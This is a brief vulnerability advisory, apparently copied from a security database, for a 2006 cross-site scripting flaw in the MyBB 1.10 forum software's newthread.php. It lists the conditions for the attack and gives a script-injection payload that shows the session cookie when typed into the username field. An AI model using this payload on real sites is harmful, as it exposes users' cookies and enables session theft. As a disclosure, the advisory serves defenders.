Lucene search
SecurityvulnsSECURITYVULNS:DOC:12146HistoryApr 10, 2006 - 12:00 a.m.
MyBB 1.10 'newthread.php' < CrossSiteScripting >
2006-04-1000:00:00
vulners.com
40
MyBB 1.10 'newthread.php' < CrossSiteScripting >
[ Devil-00 | D3vil-0x1 ]
[] Conditions []
1- your unregisterd user
2- you have permissions to do newthread
[---------------]
do newthread with this username :-
<script>alert(document.cookie);</script>D3vil-0x1
Then Preview it ;)
[---------------]